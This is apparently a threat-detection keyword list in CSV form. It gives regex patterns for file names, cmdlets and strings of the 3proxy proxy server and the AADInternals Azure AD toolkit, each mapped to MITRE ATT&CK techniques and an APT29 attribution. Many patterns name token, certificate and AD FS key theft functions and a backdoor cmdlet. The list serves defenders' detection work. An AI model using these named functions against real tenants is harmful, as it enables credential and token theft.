"*3proxy tiny proxy server*",".{0,1000}3proxy\stiny\sproxy\sserver.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*3proxy Windows Authentication plugin*",".{0,1000}3proxy\sWindows\sAuthentication\splugin.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*3proxy.exe --*",".{0,1000}3proxy\.exe\s\-\-.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*3proxy.service*",".{0,1000}3proxy\.service.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","#servicename","linux servicename","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*3proxy/3proxy*",".{0,1000}3proxy\/3proxy.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","1","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*3proxy@3proxy.org*",".{0,1000}3proxy\@3proxy\.org.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","#email","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"*add3proxyuser.sh*",".{0,1000}add3proxyuser\.sh.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z"
"* -ServiceName ""AADInternals""*",".{0,1000}\s\-ServiceName\s\""AADInternals\"".{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","#servicename","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*/AADInternals.git*",".{0,1000}\/AADInternals\.git.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*\AADInternals\*",".{0,1000}\\AADInternals\\.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*\CloudShell.ps1*",".{0,1000}\\CloudShell\.ps1.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*\CloudShell_utils.ps1*",".{0,1000}\\CloudShell_utils\.ps1.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*\DCaaS_utils.ps1",".{0,1000}\\DCaaS_utils\.ps1","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*\InjectDLL.exe*",".{0,1000}\\InjectDLL\.exe.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*\PTASpy.dll*",".{0,1000}\\PTASpy\.dll.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*\PTASpy.ps1*",".{0,1000}\\PTASpy\.ps1.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*A little service to steal the AD FS DKM secret :)*",".{0,1000}A\slittle\sservice\sto\ssteal\sthe\sAD\sFS\sDKM\ssecret\s\:\).{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*AADConnectProvisioningAgentWizard.exe*",".{0,1000}AADConnectProvisioningAgentWizard\.exe.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*AADInternals.exe*",".{0,1000}AADInternals\.exe.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*AADInternals.pdb*",".{0,1000}AADInternals\.pdb.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*AADInternals.psd1*",".{0,1000}AADInternals\.psd1.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*AADInternals.psm1*",".{0,1000}AADInternals\.psm1.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Add-AADIntAccessTokenToCache*",".{0,1000}Add\-AADIntAccessTokenToCache.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Add-AADIntEASDevice*",".{0,1000}Add\-AADIntEASDevice.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Add-AADIntRolloutPolicyGroups*",".{0,1000}Add\-AADIntRolloutPolicyGroups.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Add-AADIntSPOSiteFiles*",".{0,1000}Add\-AADIntSPOSiteFiles.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Add-AADIntSyncFabricServicePrincipal*",".{0,1000}Add\-AADIntSyncFabricServicePrincipal.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*AzureADConnectAuthenticationAgentService.exe*",".{0,1000}AzureADConnectAuthenticationAgentService\.exe.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*ConvertTo-AADIntBackdoor*",".{0,1000}ConvertTo\-AADIntBackdoor.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Disable-AADIntTenantMsolAccess*",".{0,1000}Disable\-AADIntTenantMsolAccess.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*DSInternals\DSInternals.Replication.dll*",".{0,1000}DSInternals\\DSInternals\.Replication\.dll.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*DSInternals\DSInternals.Replication.Interop.dll*",".{0,1000}DSInternals\\DSInternals\.Replication\.Interop\.dll.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*DSInternals\DSInternals.Replication.Model.dll*",".{0,1000}DSInternals\\DSInternals\.Replication\.Model\.dll.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*DSInternals\msvcp140.dll*",".{0,1000}DSInternals\\msvcp140\.dll.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*DSInternals\NDceRpc.Microsoft.dll*",".{0,1000}DSInternals\\NDceRpc\.Microsoft\.dll.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*DSInternals\vcruntime140.dll*",".{0,1000}DSInternals\\vcruntime140\.dll.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*DSInternals\vcruntime140_1.dll*",".{0,1000}DSInternals\\vcruntime140_1\.dll.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Enable-AADIntTenantMsolAccess*",".{0,1000}Enable\-AADIntTenantMsolAccess.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Export-AADIntADFSCertificates*",".{0,1000}Export\-AADIntADFSCertificates.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Export-AADIntADFSConfiguration*",".{0,1000}Export\-AADIntADFSConfiguration.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Export-AADIntADFSEncryptionKey*",".{0,1000}Export\-AADIntADFSEncryptionKey.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Export-AADIntAzureCliTokens*",".{0,1000}Export\-AADIntAzureCliTokens.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Export-AADIntLocalDeviceCertificate*",".{0,1000}Export\-AADIntLocalDeviceCertificate.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Export-AADIntLocalDeviceTransportKey*",".{0,1000}Export\-AADIntLocalDeviceTransportKey.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Export-AADIntProxyAgentBootstraps*",".{0,1000}Export\-AADIntProxyAgentBootstraps.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Export-AADIntProxyAgentCertificates*",".{0,1000}Export\-AADIntProxyAgentCertificates.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Export-AADIntProxyAgentCertificates.*",".{0,1000}Export\-AADIntProxyAgentCertificates\..{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Export-AADIntSPOSiteFile*",".{0,1000}Export\-AADIntSPOSiteFile.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Export-AADIntTeamsTokens*",".{0,1000}Export\-AADIntTeamsTokens.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Export-AADIntTokenBrokerTokens*",".{0,1000}Export\-AADIntTokenBrokerTokens.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Export-ADFSEncryptionKeyUsingService*",".{0,1000}Export\-ADFSEncryptionKeyUsingService.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Gerenios/AADInternals*",".{0,1000}Gerenios\/AADInternals.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAADConnectStatus*",".{0,1000}Get\-AADIntAADConnectStatus.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessAccessPackages*",".{0,1000}Get\-AADIntAccessAccessPackages.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
